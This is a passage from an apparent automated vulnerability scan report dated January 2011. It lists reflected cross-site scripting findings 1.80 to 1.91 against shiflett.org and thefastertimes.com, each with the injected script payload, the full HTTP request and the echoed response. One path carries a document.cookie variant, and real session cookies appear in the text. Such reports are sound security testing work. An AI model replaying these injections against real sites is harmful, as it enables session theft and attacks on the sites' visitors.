1.80. http://shiflett.org/images/foiling_cross_site_attacks_2.png/x26imgrefurl/x3dhttp:/shiflett.org/articles/foiling-cross-site-attacks/x26usg/x3d__ysaGOMVGqkatFpnmunFH03GTc1U/x3d/x26h/x3d450/x26w/x3d600/x26sz/x3d76/x26hl/x3den/x26start/x3d5/x26zoom/x3d1/x26tbnid/x3dcRpEy4veiZs2lM:/x26tbnh/x3d101/x26tbnw/x3d135/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shiflett.org
Path:   /images/foiling_cross_site_attacks_2.png/x26imgrefurl/x3dhttp:/shiflett.org/articles/foiling-cross-site-attacks/x26usg/x3d__ysaGOMVGqkatFpnmunFH03GTc1U/x3d/x26h/x3d450/x26w/x3d600/x26sz/x3d76/x26hl/x3den/x26start/x3d5/x26zoom/x3d1/x26tbnid/x3dcRpEy4veiZs2lM:/x26tbnh/x3d101/x26tbnw/x3d135/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e77d2<script>alert(1)</script>ed10b7483a3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /imagese77d2<script>alert(1)</script>ed10b7483a3/foiling_cross_site_attacks_2.png/x26imgrefurl/x3dhttp:/shiflett.org/articles/foiling-cross-site-attacks/x26usg/x3d__ysaGOMVGqkatFpnmunFH03GTc1U/x3d/x26h/x3d450/x26w/x3d600/x26sz/x3d76/x26hl/x3den/x26start/x3d5/x26zoom/x3d1/x26tbnid/x3dcRpEy4veiZs2lM:/x26tbnh/x3d101/x26tbnw/x3d135/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images HTTP/1.1
Host: shiflett.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:44:00 GMT
Server: Apache/2.2.11 (Ubuntu) DAV/2 SVN/1.5.4 mod_ssl/2.2.11 OpenSSL/0.9.8g PHP/5.3.2
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=e6d3fc5262330322a6c6113fe3a36a24; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 5284
Connection: close
Content-Type: text/html; charset=UTF-8

<pre>Zend_Controller_Dispatcher_Exception Object
(
[message:protected] => "imagese77d2<script>alert(1)<" controller does not exist
[string:Exception:private] =>
[code:protected] => 0

...[SNIP]...
(
[0] => Zend_Controller_Request_Http Object
(
[_requestUri:protected] => /imagese77d2<script>alert(1)</script>ed10b7483a3/foiling_cross_site_attacks_2.png/x26imgrefurl/x3dhttp:/shiflett.org/articles/foiling-cross-site-attacks/x26usg/x3d__ysaGOMVGqkatFpnmunFH03GTc1U/x3d/x26h/x3d450/x26w/x3d600/x26sz/x3d76/x26hl/x3den/x26s
...[SNIP]...

1.81. http://shiflett.org/images/foiling_cross_site_attacks_2.png/x26imgrefurl/x3dhttp:/shiflett.org/articles/foiling-cross-site-attacks/x26usg/x3d__ysaGOMVGqkatFpnmunFH03GTc1U/x3d/x26h/x3d450/x26w/x3d600/x26sz/x3d76/x26hl/x3den/x26start/x3d5/x26zoom/x3d1/x26tbnid/x3dcRpEy4veiZs2lM:/x26tbnh/x3d101/x26tbnw/x3d135/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://shiflett.org
Path:   /images/foiling_cross_site_attacks_2.png/x26imgrefurl/x3dhttp:/shiflett.org/articles/foiling-cross-site-attacks/x26usg/x3d__ysaGOMVGqkatFpnmunFH03GTc1U/x3d/x26h/x3d450/x26w/x3d600/x26sz/x3d76/x26hl/x3den/x26start/x3d5/x26zoom/x3d1/x26tbnid/x3dcRpEy4veiZs2lM:/x26tbnh/x3d101/x26tbnw/x3d135/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3fc2c<script>alert(1)</script>ca3d970e655 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images/foiling_cross_site_attacks_2.png3fc2c<script>alert(1)</script>ca3d970e655/x26imgrefurl/x3dhttp:/shiflett.org/articles/foiling-cross-site-attacks/x26usg/x3d__ysaGOMVGqkatFpnmunFH03GTc1U/x3d/x26h/x3d450/x26w/x3d600/x26sz/x3d76/x26hl/x3den/x26start/x3d5/x26zoom/x3d1/x26tbnid/x3dcRpEy4veiZs2lM:/x26tbnh/x3d101/x26tbnw/x3d135/x26ei/x3dvuNGTcm_IsKBlAfY9qD0Dw/x26prev/x3d/images HTTP/1.1
Host: shiflett.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 31 Jan 2011 17:44:01 GMT
Server: Apache/2.2.11 (Ubuntu) DAV/2 SVN/1.5.4 mod_ssl/2.2.11 OpenSSL/0.9.8g PHP/5.3.2
X-Powered-By: PHP/5.3.2
Set-Cookie: PHPSESSID=50bf4b0dd4d7f6b8ef5eb76e7dcd811d; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 5240
Connection: close
Content-Type: text/html; charset=UTF-8

<pre>Zend_Controller_Dispatcher_Exception Object
(
[message:protected] => "images" controller does not exist
[string:Exception:private] =>
[code:protected] => 0
[file:protected] => /w
...[SNIP]...
[0] => Zend_Controller_Request_Http Object
(
[_requestUri:protected] => /images/foiling_cross_site_attacks_2.png3fc2c<script>alert(1)</script>ca3d970e655/x26imgrefurl/x3dhttp:/shiflett.org/articles/foiling-cross-site-attacks/x26usg/x3d__ysaGOMVGqkatFpnmunFH03GTc1U/x3d/x26h/x3d450/x26w/x3d600/x26sz/x3d76/x26hl/x3den/x26start/x3d5/x26zoom/x3d1/x26tbnid/x
...[SNIP]...

1.82. http://thefastertimes.com/about/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://thefastertimes.com
Path:   /about/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8001"><script>alert(1)</script>a1b8a31b6e6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f8001\"><script>alert(1)</script>a1b8a31b6e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /about/?f8001"><script>alert(1)</script>a1b8a31b6e6=1 HTTP/1.1
Host: thefastertimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=57436015.1296504542.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/33; PHPSESSID=eae44889a6aaf1b6e3931692068c6a05; __utma=57436015.2119891732.1296504542.1296504542.1296504542.1; _urtak_ursk=BAh7CToRcl9zZXNzaW9uX2lkMDoMZXhwaXJlc0l1OglUaW1lDfTDIMDAqLoGBjofQG1hcnNoYWxfd2l0aF91dGNfY29lcmNpb25UOgx1c2VyX2lkMDoLcmFuZG9tIiMwMDAxMzEwMCA6IDMgTTBhSjpvKzIyMG4gIDIxbjE%3D--412cad7633dbe777e841f2348764ef1fb7404c5d%7C29a20f8a34e3d1dc0bdf48916623bd44; __utmc=57436015; __qca=P0-2030699969-1296504545420; __utmb=57436015.2.10.1296504542;

Response

HTTP/1.0 200 OK
Date: Mon, 31 Jan 2011 20:52:00 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.9
Vary: Cookie
X-Pingback: http://thefastertimes.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<input type="hidden" name="redirect_to" value="/about/?f8001\"><script>alert(1)</script>a1b8a31b6e6=1" />
...[SNIP]...

1.83. http://thefastertimes.com/socialmedia/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://thefastertimes.com
Path:   /socialmedia/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30f95"><script>alert(1)</script>ba9b92ed14b was submitted in the REST URL parameter 1. This input was echoed as 30f95\"><script>alert(1)</script>ba9b92ed14b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /socialmedia30f95"><script>alert(1)</script>ba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp HTTP/1.1
Host: thefastertimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 31 Jan 2011 18:01:37 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=eae44889a6aaf1b6e3931692068c6a05; path=/
Vary: Cookie
X-Pingback: http://thefastertimes.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 31 Jan 2011 18:01:34 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<input type="hidden" name="redirect_to" value="/socialmedia30f95\"><script>alert(1)</script>ba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp" />
...[SNIP]...

1.84. http://thefastertimes.com/socialmedia/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://thefastertimes.com
Path:   /socialmedia/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1307"><script>alert(1)</script>97e10d51e52 was submitted in the REST URL parameter 2. This input was echoed as f1307\"><script>alert(1)</script>97e10d51e52 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /socialmedia/2011f1307"><script>alert(1)</script>97e10d51e52/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp HTTP/1.1
Host: thefastertimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 31 Jan 2011 18:02:22 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=21377961c5fe6ca527ac4b7a3f5c7ae3; path=/
Vary: Cookie
X-Pingback: http://thefastertimes.com/socialmedia/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 31 Jan 2011 18:02:21 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<input type="hidden" name="redirect_to" value="/socialmedia/2011f1307\"><script>alert(1)</script>97e10d51e52/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp" />
...[SNIP]...

1.85. http://thefastertimes.com/socialmedia/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://thefastertimes.com
Path:   /socialmedia/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89cdd"><script>alert(1)</script>cc94d955a23 was submitted in the REST URL parameter 3. This input was echoed as 89cdd\"><script>alert(1)</script>cc94d955a23 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /socialmedia/2011/0189cdd"><script>alert(1)</script>cc94d955a23/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp HTTP/1.1
Host: thefastertimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 31 Jan 2011 18:04:33 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=990e20ffb5e6047b90ac8ea04654f25a; path=/
Vary: Cookie
X-Pingback: http://thefastertimes.com/socialmedia/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 31 Jan 2011 18:04:32 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<input type="hidden" name="redirect_to" value="/socialmedia/2011/0189cdd\"><script>alert(1)</script>cc94d955a23/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp" />
...[SNIP]...

1.86. http://thefastertimes.com/socialmedia/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://thefastertimes.com
Path:   /socialmedia/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f73ff"><script>alert(1)</script>8db99260b37 was submitted in the REST URL parameter 4. This input was echoed as f73ff\"><script>alert(1)</script>8db99260b37 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /socialmedia/2011/01/25f73ff"><script>alert(1)</script>8db99260b37/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp HTTP/1.1
Host: thefastertimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 31 Jan 2011 18:04:39 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=94e3c93da979f5c6aaa6b1b37e48d845; path=/
Vary: Cookie
X-Pingback: http://thefastertimes.com/socialmedia/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 31 Jan 2011 18:04:39 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<input type="hidden" name="redirect_to" value="/socialmedia/2011/01/25f73ff\"><script>alert(1)</script>8db99260b37/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp" />
...[SNIP]...

1.87. http://thefastertimes.com/socialmedia/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://thefastertimes.com
Path:   /socialmedia/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32a32"><script>alert(1)</script>70e86cd3338 was submitted in the REST URL parameter 5. This input was echoed as 32a32\"><script>alert(1)</script>70e86cd3338 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /socialmedia/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman32a32"><script>alert(1)</script>70e86cd3338/x26amp HTTP/1.1
Host: thefastertimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 31 Jan 2011 18:04:45 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=3123b41cae1efa35d010678b001ca2fb; path=/
Vary: Cookie
X-Pingback: http://thefastertimes.com/socialmedia/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 31 Jan 2011 18:04:44 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<input type="hidden" name="redirect_to" value="/socialmedia/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman32a32\"><script>alert(1)</script>70e86cd3338/x26amp" />
...[SNIP]...

1.88. http://thefastertimes.com/socialmedia/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://thefastertimes.com
Path:   /socialmedia/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20215"><script>alert(1)</script>3f11104f034 was submitted in the REST URL parameter 6. This input was echoed as 20215\"><script>alert(1)</script>3f11104f034 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /socialmedia/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp20215"><script>alert(1)</script>3f11104f034;rct\\x3dj\\x26amp;sa\\x3dX\\x26amp;ei\\x3dteNGTZzQLsb_lged9pk8\\x26amp;ved\\x3d0CHQQpwIwCQ\\x26amp;q\\x3dcross+site+scripting\\x26amp;usg\\x3dAFQjCNFxxHBCsJxbVmlltPu2G-yyz6X_1w\\x22 HTTP/1.1
Host: thefastertimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 31 Jan 2011 18:05:13 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=0ef8276f563ac145ff17e6a808d7e416; path=/
Vary: Cookie
X-Pingback: http://thefastertimes.com/socialmedia/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 31 Jan 2011 18:05:13 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<input type="hidden" name="redirect_to" value="/socialmedia/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp20215\"><script>alert(1)</script>3f11104f034;rct\\\\x3dj\\\\x26amp;sa\\\\x3dX\\\\x26amp;ei\\\\x3dteNGTZzQLsb_lged9pk8\\\\x26amp;ved\\\\x3d0CHQQpwIwCQ\\\\x26amp;q\\\\x3dcross+site+scripting\\\\x26amp;usg\\\\x3dAFQjCNFxxHBCsJxbVmlltPu2G-yyz6X_1w\\
...[SNIP]...

1.89. http://thefastertimes.com/socialmedia/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://thefastertimes.com
Path:   /socialmedia/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a233"><script>alert(1)</script>c66f355344f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4a233\"><script>alert(1)</script>c66f355344f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /socialmedia/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp?4a233"><script>alert(1)</script>c66f355344f=1 HTTP/1.1
Host: thefastertimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 31 Jan 2011 18:00:56 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=2f30351892d2c2142b9d3a85c352577e; path=/
Vary: Cookie
X-Pingback: http://thefastertimes.com/socialmedia/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 31 Jan 2011 18:00:55 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<input type="hidden" name="redirect_to" value="/socialmedia/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp?4a233\"><script>alert(1)</script>c66f355344f=1" />
...[SNIP]...

1.90. http://thefastertimes.com/socialmedia/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp [rct\\x3dj\\x26amp;sa\\x3dX\\x26amp;ei\\x3dteNGTZzQLsb_lged9pk8\\x26amp;ved\\x3d0CHQQpwIwCQ\\x26amp;q\\x3dcross+site+scripting\\x26amp;usg\\x3dAFQjCNFxxHBCsJxbVmlltPu2G-yyz6X_1w\\x22 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://thefastertimes.com
Path:   /socialmedia/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp

Issue detail

The value of the rct\\x3dj\\x26amp;sa\\x3dX\\x26amp;ei\\x3dteNGTZzQLsb_lged9pk8\\x26amp;ved\\x3d0CHQQpwIwCQ\\x26amp;q\\x3dcross+site+scripting\\x26amp;usg\\x3dAFQjCNFxxHBCsJxbVmlltPu2G-yyz6X_1w\\x22 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f748"><script>alert(1)</script>6e9663119ac was submitted in the rct\\x3dj\\x26amp;sa\\x3dX\\x26amp;ei\\x3dteNGTZzQLsb_lged9pk8\\x26amp;ved\\x3d0CHQQpwIwCQ\\x26amp;q\\x3dcross+site+scripting\\x26amp;usg\\x3dAFQjCNFxxHBCsJxbVmlltPu2G-yyz6X_1w\\x22 parameter. This input was echoed as 9f748\"><script>alert(1)</script>6e9663119ac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /socialmedia/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp;rct\\x3dj\\x26amp;sa\\x3dX\\x26amp;ei\\x3dteNGTZzQLsb_lged9pk8\\x26amp;ved\\x3d0CHQQpwIwCQ\\x26amp;q\\x3dcross+site+scripting\\x26amp;usg\\x3dAFQjCNFxxHBCsJxbVmlltPu2G-yyz6X_1w\\x229f748"><script>alert(1)</script>6e9663119ac HTTP/1.1
Host: thefastertimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 31 Jan 2011 18:01:33 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.2.9
Set-Cookie: PHPSESSID=59abd215b5d8ee4c4ab4ca9b598dc7b9; path=/
Vary: Cookie
X-Pingback: http://thefastertimes.com/socialmedia/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Mon, 31 Jan 2011 18:01:32 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
\\\x3dj\\\\x26amp;sa\\\\x3dX\\\\x26amp;ei\\\\x3dteNGTZzQLsb_lged9pk8\\\\x26amp;ved\\\\x3d0CHQQpwIwCQ\\\\x26amp;q\\\\x3dcross+site+scripting\\\\x26amp;usg\\\\x3dAFQjCNFxxHBCsJxbVmlltPu2G-yyz6X_1w\\\\x229f748\"><script>alert(1)</script>6e9663119ac" />
...[SNIP]...

1.91. http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg [REST URL parameter 10]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://thefastertimes.com
Path:   /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg

Issue detail

The value of REST URL parameter 10 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8188"><script>alert(1)</script>e9ff90f9af1 was submitted in the REST URL parameter 10. This input was echoed as a8188\"><script>alert(1)</script>e9ff90f9af1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /socialmedia30f95%22%3E%3Cscript%3Ealertdocument.cookie%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/%3Cbr%20/%3E%3Cb%3EWarning%3C/b%3E:%20%20getimagesizehttp:/thefastertimes.coma8188"><script>alert(1)</script>e9ff90f9af1/files/2011/01/obama-egypt.jpg%20%3Ca%20href=function.getimagesize%3Efunction.getimagesize%3C/a%3E:%20could%20not%20make%20seekable%20-%20http:/thefastertimes.com/files/2011/01/obama-egypt.jpg%20in%20%3Cb%3E/home/thefast/public_html/wp-content/themes/ft/functions.php%3C/b%3E%20on%20line%20%3Cb%3E450%3C/b%3E%3Cbr%20/%3Ehttp:/thefastertimes.com/files/2011/01/obama-egypt.jpg HTTP/1.1
Host: thefastertimes.com
Proxy-Connection: keep-alive
Referer: http://thefastertimes.com/socialmedia30f95%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eba9b92ed14b/2011/01/25/social-media-star-city-pages-editor-in-chief-kevin-hoffman/x26amp
Accept: */*
